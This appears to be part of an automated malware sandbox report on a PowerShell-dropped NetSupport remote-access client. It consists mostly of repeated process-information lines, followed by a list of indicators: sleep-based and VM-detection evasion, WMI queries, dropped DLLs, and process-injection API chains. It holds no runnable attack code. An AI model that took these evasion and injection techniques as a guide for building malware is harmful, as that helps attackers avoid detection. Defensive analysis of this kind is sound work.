                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProgramData\netsupport\client\client32.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe Process information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEB91F032_2_6BEB91F0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEC4F3032_2_6BEC4F30
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110B7290 Sleep,ExitProcess,32_2_110B7290
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899888
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899776
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899664
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899552
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899440
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899312
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899200
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7678
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2187
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1859
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7949
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1654
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8173
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1945
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2502
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 882
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 480
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\ProgramData\netsupport\client\AudioCapture.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\ProgramData\netsupport\client\TCCTL32.DLL
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\ProgramData\netsupport\client\remcmdstub.exe
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\ProgramData\netsupport\client\HTCTL32.DLL
                                    Source: C:\ProgramData\netsupport\client\client32.exeEvaded block: after key decisiongraph_32-96141
                                    Source: C:\ProgramData\netsupport\client\client32.exeEvaded block: after key decisiongraph_32-98237
                                    Source: C:\ProgramData\netsupport\client\client32.exeEvaded block: after key decisiongraph_32-101586
                                    Source: C:\ProgramData\netsupport\client\client32.exeEvaded block: after key decisiongraph_32-101973
                                    Source: C:\ProgramData\netsupport\client\client32.exeEvaded block: after key decisiongraph_32-102223
                                    Source: C:\ProgramData\netsupport\client\client32.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_32-101718
                                    Source: C:\ProgramData\netsupport\client\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_32-98042
                                    Source: C:\ProgramData\netsupport\client\client32.exeAPI coverage: 6.3 %
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596Thread sleep time: -4611686018427385s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576Thread sleep count: 1859 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576Thread sleep count: 7949 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3484Thread sleep count: 1654 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2276Thread sleep count: 8173 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044Thread sleep time: -4611686018427385s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044Thread sleep time: -900000s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044Thread sleep time: -899888s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044Thread sleep time: -899776s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044Thread sleep time: -899664s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044Thread sleep time: -899552s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044Thread sleep time: -899440s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044Thread sleep time: -899312s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044Thread sleep time: -899200s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5132Thread sleep count: 1945 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3744Thread sleep count: 2502 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676Thread sleep time: -4611686018427385s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep count: 882 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep count: 480 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                                    Source: C:\ProgramData\netsupport\client\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\ProgramData\netsupport\client\client32.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEC3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6BEC3226h32_2_6BEC3130
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,32_2_1102D1B3
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11069760 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,32_2_11069760
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11123690 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,32_2_11123690
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11108090 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,32_2_11108090
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110BC0E0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,32_2_110BC0E0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,32_2_1102CE84
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11064EF0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,32_2_11064EF0
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BAF53778 GetSystemInfo,25_2_00007FF9BAF53778
                                    Source: HTCTL32.DLL.26.drBinary or memory string: VMware
                                    Source: powershell.exe, 00000029.00000002.2535977313.000002678CAF6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: # BKiMitLJGDL9NaX+nk4vmCIjaQQ2tULiu82AWhbXS7NsVRmPmCQW0LucN/Z0BUZX
                                    Source: powershell.exe, 00000029.00000002.2535977313.000002678CAF6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmCIjaQQ
                                    Source: client32.exe, 00000020.00000002.2520445291.00000000008E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AF_UNIXhreadWndClassHyper-V RAWL
